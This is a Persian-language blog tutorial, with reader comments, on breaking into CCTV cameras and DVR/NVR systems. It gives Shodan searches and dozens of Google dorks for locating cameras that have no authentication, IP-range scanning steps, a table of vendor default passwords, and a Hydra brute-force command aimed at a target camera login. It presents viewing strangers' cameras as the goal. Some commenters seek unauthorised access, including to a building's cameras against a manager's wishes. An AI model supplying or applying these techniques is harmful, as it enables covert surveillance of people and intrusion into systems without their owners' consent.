امنیتتست نفوذتست نفوذ شبکه

روش های نفوذ به دوربین مداربسته

روشهای رایج که برای نفوذ به دوربین های مداربسته به کار میروند

امروزه دوربین مداربسته به یک سیستم امنیتی مهم تبدیل شده است که در اکثر مکان ها مانند مغازه ها، مراکز، دفاتر، انبار و غیره استفاده می شود.در این آموزش با روش های نفوذ به دوربین های مداربسته آشنا خواهید شد.

اگر بخواهیم روش های نفوذ به دوربین های مداربسته را به ترتیب بیان کنیم، یک لیست به صورت زیر خواهیم داشت:

  1. دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)
  2. پیدا کردن پسورد
  3. دسترسی فیزیکی
  4. هک وبسایت سرویس دهنده
  5. هک دستگاه DVR/NVR

دوربین های پیکربندی نشده(عدم نیاز به احراز هویت)

در روش اول ما از طریق چند روش میتوانیم دوربین های مورد نظر خود را پیدا کنیم. به عنوان مثال : استفاده از موتور جستجوی شودان یا استفاده از گوگل و…

به منظور شروع جستجو در وب سایت شودان ابتدا به آدرس shodan.io رفته و به حساب کاربری خود در شودان لاگین کنید.

راه های زیادی به منظور جستجوی دوربین ها درون شودان وجود دارد. به عنوان نمونه جستجو بر اساس نام سازنده وبکم شروع خوبی است. به یاد داشته باشید که شودان اطلاعات بنر سازنده ها را ذخیره می کند و جستجو را بر این اساس انجام می دهد نه محتوای آنها. یکی از سازنده های معروف که نتایج خوبی را به همراه دارد، webcamxp می باشد که صدها نتیجه را به همراه خواهد داشت. به این منظور کلمه کلیدی webcamxp را درون نوار جستجو وارد کنید. همانطور که مشاهده می کنید نتایج زیادی را به همراه دارد.

تمام این وبکم ها به دلیل عدم وجود احرازهویت توسط شما قابل مشاهده هستند. و ما میتوانیم با باز کردن ایپی ادرس انها در مرورگر خود، بدون نیاز به احراز هویت دوربین ها را تماشا کنیم.

هک دوربین ها مدار بسته با شودان

همچنین میتوانیم از گوگل برای پیدا کردن این گونه دوربین ها استفاده کنیم که در این حالت نیاز به دورک های خاص داریم. به عنوان مثال من چند مورد از این دورک ها رو برای شما میزارم:

    inurl:”CgiStart?page=”
    inurl:/view.shtml
    intitle:”Live View / – AXIS
    inurl:view/view.shtml
    inurl:ViewerFrame?Mode=
    inurl:ViewerFrame?Mode=Refresh
    inurl:axis-cgi/jpg
    inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
    inurl:view/indexFrame.shtml
    inurl:view/index.shtml
    inurl:view/view.shtml
    liveapplet
    intitle:”live view” intitle:axis
    intitle:liveapplet
    allintitle:”Network Camera NetworkCamera” (disconnected)
    intitle:axis intitle:”video server”
    intitle:liveapplet inurl:LvAppl
    intitle:”EvoCam” inurl:”webcam.html”
    intitle:”Live NetSnap Cam-Server feed”
    intitle:”Live View / – AXIS”
    intitle:”Live View / – AXIS 206M”
    intitle:”Live View / – AXIS 206W”
    intitle:”Live View / – AXIS 210?
    inurl:indexFrame.shtml Axis
    inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
    intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”
    intitle:snc-z20 inurl:home/
    intitle:snc-cs3 inurl:home/
    intitle:snc-rz30 inurl:home/
    intitle:”sony network camera snc-p1?
    intitle:”sony network camera snc-m1?
    site:.viewnetcam.com -www.viewnetcam.com
    intitle:”Toshiba Network Camera” user login
    intitle:”netcam live image” (disconnected)
    intitle:”i-Catcher Console – Web Monitor”

روش پیدا کردن پسورد(Find password)

یکی از رایج ترین روش های نفوذ به دوربین های مدار بسته، روش پیدا کردن پسورد است. تمامی دوربین های مداربسته به یک دستگاه DVR/NVR که وظیفه کنترل و مدیریت دوربین ها را دارد متصل میشوند و این دستگاه نیز از طریق کابل شبکه به اینترنت متصل میشود. دستگاه DVR/NVR بعد از متصل شدن به اینترنت یک ایپی استاتیک دریافت میکند که یک هکر با داشتن آن ip و یوزرنیم و پسورد متعلق به آن، میتواند در هر جای دنیا که باشد از طریق اینترنت به دوربین ها دسترسی پیدا کند.

حال ۲ سناریو به وجود می آید:

  1. روش های پیدا کردن ip دوربین ها
  2. داشتن ایپی دوربین ها و نداشتن پسورد انها

برای سناریو اول نیز میتوانیم از چند روش استفاده بکنیم که بهترین آنها استفاده از موتورهای جستجو یا اسکن رنج ایپی های متفاوت است.

در روش موتورهای جستجو، همانند روشی عمل میکنیم که در دوربین های پیکربندی نشده به ان اشاره کردیم.

در روش اسکن رنج ایپی های متفاوت نیز میتوانیم به صورت زیر عمل کنیم:

  1.  نصب برنامه Angry Ip Scanner
  2. انتخاب رنج ایپی مناسب
  3. کانفیگ پورت برنامه انگری ایپی اسکنر به پورت های مورد استفاده در دوربین ها

بعد از دانلود و نصب برنامه به سراغ انتخاب رنج ایپی مناسب برای دوربین های مدار بسته میرویم که من پیشنهاد میکنم از رنج ایپی خود برای این کار استفاده کنید. برای این کار کافی است تا عبارت “my ip” را در گوگل سرچ کنید.

در مرحله بعد پورت های مهم را در برنامه تنظیم میکنیم:

همچنین در قسمت Fetchers نیز گزینه web detect را مانند تصویر زیر انتخاب میکنیم:

حالا کافی است تا رنج خود را در برنامه تنظیم کرده و اسکن را شروع کنیم:

بعد از باز کردن ایپی مورد نظر در مرورگر خود به صفحه لاگین دوربین میرسیم که مهم ترین قسمت کار به شمار میرود. و سناریو دوم ما به حساب می اید:برای پیدا کردن پسورد چندین راه وجود دارد که مهم ترین انها میتواند: شکستن پسود یا استفاده از پسورد های پیشفرض باشد.

اولین گام به منظور عبور از این سیستم ها امتحان کردن نام کاربری و رمزعبورهای پیش فرض موجود این وبکم ها می باشد . برخی از اعتبارنامه های پیش فرض این وبکم ها به شرح زیر می باشد:

ACTi : admin/123456 , Admin/123456
Axis (Old) : root/pass 
Grandstream: admin/admin
IQinVision: root/system
Mobotix: admin/meinsm
Panasonic: admin/12345
Samsung Electronics: root/root , admin/4321
Samsung Techwin :admin/4321 , admin/1111111
Sony: admin/admin
TRENDnet: admin/admin
Toshiba: root/ikwd
Vivotek : root,empty
WebcamXP: admin/empty

در روش شکستن پسورد هم میتوانیم از ابزارهای موجود برای کرک کردن استفاده کنیم که یکی از این ابزارها، Hydra میباشد. این ابزار به صورت پیشفرض در سیستم عامل کالی لینوکس موجود میباشد که با استفاده از دستور زیر در محیط ترمینال میتوانیم از ان استفاده کنیم:

root@kaliboys:~# hydra -s 80 -l admin -P /root/Desktop/wl/cctvpass.txt -e ns -t 16 targetIP http
آرگومان های استفاده شده در این دستور:
  • -s 80 شناسایی پورت
  • -l admin یوزرنیم پیشفرض استفاده شده
  • -P /root/desktop/worldlist.txt انتخاب پسورد لیست مناسب
  • -e پسورد خالی
  • ns تلاش برای لاگین کردن با پسورد خالی
  • http پورت لازم برای اتک

۳ روش باقیمانده دیگر نیز براساس نام انها قابل درک است و نیازی به توضیح ندارند. ولی میتوان گفت که سخت ترین روش ها میباشند. چون برای مثال یک شرکت سازنده دستگاه dvr، هیچ موقع باگی برای نفوذ باقی نمیگذارد تا با استفاده از ان نفوذگر بتواند به سیستم عبور کند. ولی امنیت هیچ موقع ۱۰۰ درصد نبوده و نخواهد بود پس احتما هک شدن سیستم با این روش نیز امکان دارد.

امیدوارم که این آموزش نیز براتون مفید بوده باشه. لطفا نظرات خودتون رو زیر پست برام کامنت کنید.

دوره آموزشی تست نفوذ دوربین های مدار بسته

برای تهیه این دوره بر روی تصویر زیر کلیک کنید.

دوره آموزشی تست نفوذ دوربین های مدار بسته
دوره آموزشی تست نفوذ دوربین های مدار بسته

راستی! برای دریافت مطالب جدید هک و امنیت در کانال تلگرام کالی بویز عضو شوید.

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

‫17 نظرها

  1. سلام ممنون از اموزشتون ولی من ای پی هارو هرچی سرچ میکنم اصلا صفحه ای باز نمیشه

  2. سلام.میخوام برنامه نویسی رو یاد بگیرم بع نظر شما کدوم زبان برنامه نویسی بهتره؟واگه میشه ی منبع خوب هم معرفی کنید.مرسی

    1. سلام
      بستگی به علاقه شما داره.
      اینکه ایا میخوایین طراحی وب کار کنید؟یا برنامه دسکتاپی بنویسید؟یا در حوزه امنیت کار کنید و…
      ولی در کل میشه گفت الان دوره زمونه C و ++C نیست D:)
      پایتون حرف اول رو میزنه شما میتونید کتاب های جالب مثل:
      -> Python crash course
      -> Learn python the hard way
      -> Head First python
      -> Black hat python: python programming for hackers and pentesters
      و کتاب فوق العاده جالب
      -> Automate the Boring Stuff with Python
      رو مطالعه کنید.
      این کتاب میاد کار با word و excel و pdf و ارسال ایمیل و web scraping و … رو یاد میده.

  3. سلام من دوره های نتورک + و CEH و lpic1 و LPIC2 رو و با دوره کالی لینوکس و ابزار های اون رو گذروندم و دوره های CRACKING و دوره های دیگری در مورد هک و دیفیس سایت رو گذروندم و اشنا به زبان پایتون هستم ۱۴ سالمه به نظر شما چه دوره های دیگری برای یک هکر فوق العاده شدن رو به من پیشنهاد میکنید واقعا به کمک شما نیاز دارم و در اینده میخوام متخصص هک و امنیت بشوم

    1. دوست عزیز من این دوره های شمارو طی ۶ سال گذروندم و الان ۲۴ سالمه یعنی شما از ۸ سالگی هک رو شروع کردین؟؟؟ ولی به هر حال موفق باشین

    2. سلام
      تو دیگه خیلی مُخی، والا دوست عزیزمون راست میگه.
      اینطوری تو باید از 7 یا 8 سالگی شروع به یادگیری کرده باشی.
      اگر واقعا در این سن تونستی این دوره ها را پشت سر بگذاری واقعا بهت تبریک میگم، چون تو استعداد بی نظیری داری.
      هیچ وقت به این چیزی که بلد هستی قانع نباش و مباحث بیشتری رو یاد بگیر تا بتونی در آینده یه متخصص عالی هک و امنیت بشی.

  4. سلام خسته نباشید واقعا حلالتون باشه آموزشتون حرف نداره فقط اون قسمت که زده 16 t- ینی چی؟
    و قسمت http پورت لازم برای اتک رو از کجا میتونم پیدا کنم؟
    ممنون میشم به سوالم جواب بدید

  5. سلام و خسته نباشید با دسترسی فیزیکی به دستگاه DVR/NVR چحوری میشه آیپی اونو به دست آورد یا حتی راهی هست با این روش یوزر نیم و پسورد رو هم دور زد؟؟؟
    ممنون میشم پاسخ گو باشین

  6. سلام
    خیلی ممنون بابت اموزش خوبتون میخواستم بدونم که برای انجام این کار یعنی اسکن رینج ای پی حتما باید به اینترنتی که اون دوربین بهش وصله وصل شیم بعد اسکن کنیم یا نه؟؟؟

  7. سلام من هزینه دوربین مدار بسته منزلمو کامل پرداخت کردم ولی مدیر امکان دیدن دوربین طبقه و پارکینگ را نمیده و فکر میکنه خودش فقط حق داره به سیستم کنترل دسترسی داشته باشه اگه بخوام خودم دوربین طبقه و روبروی پارکینگمو ببینم راهی دارم ؟؟چه اطلاعاتی از دوربین و سیستم اتصال نیاز دارم برای اینکه با اپلیکیشن گوشیم از راه دور بتونم خونه رو ببینم ممنون میشم منو راهنمایی کنید

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا